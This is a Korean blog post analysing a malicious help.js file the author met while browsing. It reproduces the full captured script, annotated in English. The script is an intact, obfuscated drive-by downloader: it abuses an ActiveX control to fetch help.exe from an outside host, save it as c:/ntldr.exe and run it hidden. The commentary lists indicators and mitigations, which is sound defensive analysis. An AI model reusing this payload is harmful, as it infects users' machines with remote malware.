혹시 파이어폭스로 인터넷 서핑하다가 help.js를 다운로드한다는 팝업창이 나온 적이 있나요?

오늘 여러 사이트를 방문하다가 하나를 찾아 내서 다운로드하여 보았는데,

정확한 코드는 분석을 해봐야겠지만,

그냥 느낌에는 '익스플로잇'으로 보입니다.

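아래는 소스 코드입니다. eval()에 전달되는 \x 이스케이프 문자열을 ASCII로 디코딩해 보면, ActiveX 객체를 이용해 외부의 help.exe를 내려받아 c:/ntldr.exe로 저장한 뒤 실행하는 내용입니다.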

졸려서 어느 사이트였는지는 아직 '재현'하지 못하고 있습니다. T.T..

일단 자고, 내일 찾아 봐야겠습니다.

// Captured sample (help.js), reproduced unchanged for analysis.
// Structure: two layers of indirection.
//   1. The outer document.writeln() calls emit an inline <script> block into the page.
//   2. Inside that block every statement is a string of \xNN escapes handed to eval(),
//      so no readable API name, URL or path appears in the delivered text.
// The "decoded:" lines below come from converting the hex escapes to ASCII by hand;
// nothing was executed. The URL is defanged (hxxp, [.]) in the comments only.
// The chain depends on ActiveX (an <object> with a classid, then CreateObject), which is
// an Internet Explorer mechanism; presumably that is why Firefox only offered the file
// as a download instead of running it. TODO confirm against the serving page.
document.writeln("<script language=javascript>");
// The whole payload sits in try { ... } catch (error) { } with an empty handler, so any
// failure (for example a blocked object creation) is swallowed and no script error shows.
document.writeln("try");
document.writeln("{");
// decoded: var df = document.createElement('object');
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x64\\x66\\x20\\x3D\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x28\\x27\\x6F\\x62\\x6A\\x65\\x63\\x74\\x27\\x29\\x3B\");");
// decoded: df.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
// This class ID is the one registered for the RDS.DataSpace control (MDAC). Every later
// CreateObject call goes through it, so blocking instantiation of this CLSID in the
// browser (ActiveX kill bit) or patching MDAC stops the chain at this step.
document.writeln("    eval(\"\\x64\\x66\\x2E\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x28\\x27\\x63\\x6C\\x61\\x73\\x73\\x69\\x64\\x27\\x2C\\x27\\x63\\x6C\\x73\\x69\\x64\\x3A\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\\x27\\x29\\x3B\");");
// decoded: var xPost=df.CreateObject('Microsoft.XMLHTTP','');
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x50\\x6F\\x73\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58\\x4D\\x4C\\x48\\x54\\x54\\x50\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
// decoded: xPost.Open('GET','hxxp://www[.]gisa79[.]com/help.exe',0);
// Network indicator: host www[.]gisa79[.]com, path /help.exe. The third argument 0 makes
// the request synchronous, so the response is complete before the next statement runs.
document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x27\\x47\\x45\\x54\\x27\\x2C\\x27\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x67\\x69\\x73\\x61\\x37\\x39\\x2E\\x63\\x6F\\x6D\\x2F\\x68\\x65\\x6C\\x70\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
document.writeln("");
// decoded: xPost.Send();var sGet=df.CreateObject('ADODB.Stream','');
document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x53\\x65\\x6E\\x64\\x28\\x29\\x3B\\x76\\x61\\x72\\x20\\x73\\x47\\x65\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x41\\x44\\x4F\\x44\\x42\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
// decoded: sGet.Mode=3;sGet.Type=1;sGet.Open();
// ADODB.Stream Mode 3 is read/write and Type 1 is binary: the stream is set up to hold
// the downloaded bytes unmodified.
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x4D\\x6F\\x64\\x65\\x3D\\x33\\x3B\\x73\\x47\\x65\\x74\\x2E\\x54\\x79\\x70\\x65\\x3D\\x31\\x3B\\x73\\x47\\x65\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x29\\x3B\");");
// decoded: sGet.Write(xPost.ResponseBody);
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x57\\x72\\x69\\x74\\x65\\x28\\x78\\x50\\x6F\\x73\\x74\\x2E\\x52\\x65\\x73\\x70\\x6F\\x6E\\x73\\x65\\x42\\x6F\\x64\\x79\\x29\\x3B\");");
// decoded: sGet.SaveToFile('c:/ntldr.exe',2);
// Host indicator: an executable written to the root of C: as ntldr.exe. Option 2
// overwrites an existing file. The name resembles the Windows boot loader file "ntldr",
// presumably so that it passes for a system file.
document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x53\\x61\\x76\\x65\\x54\\x6F\\x46\\x69\\x6C\\x65\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x32\\x29\\x3B\");");
// decoded: var x = df.CreateObject('wscript.shell','');
document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x20\\x3D\\x20\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x77\\x73\\x63\\x72\\x69\\x70\\x74\\x2E\\x73\\x68\\x65\\x6C\\x6C\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
// decoded: x.run('c:/ntldr.exe',0);
// Window style 0 starts the saved file hidden. For detection, look for a browser process
// spawning an executable from the root of C:.
document.writeln("    eval(\"\\x78\\x2E\\x72\\x75\\x6E\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
// eval of an empty string: does nothing.
document.writeln("    eval(\"\");");
document.writeln("    ");
document.writeln("}");
document.writeln("catch (error)");
document.writeln("{");
document.writeln("}");
// "<\/" keeps the literal closing tag from ending an enclosing script element early.
document.writeln("<\/script>");
// The trailing empty writes add nothing but blank lines.
// Static signatures worth matching on: document.writeln lines that wrap eval() around
// long runs of \xNN escapes, and the hex-encoded CLSID string above.
document.writeln("");
document.writeln("");
document.writeln("")

Posted by 문스랩닷컴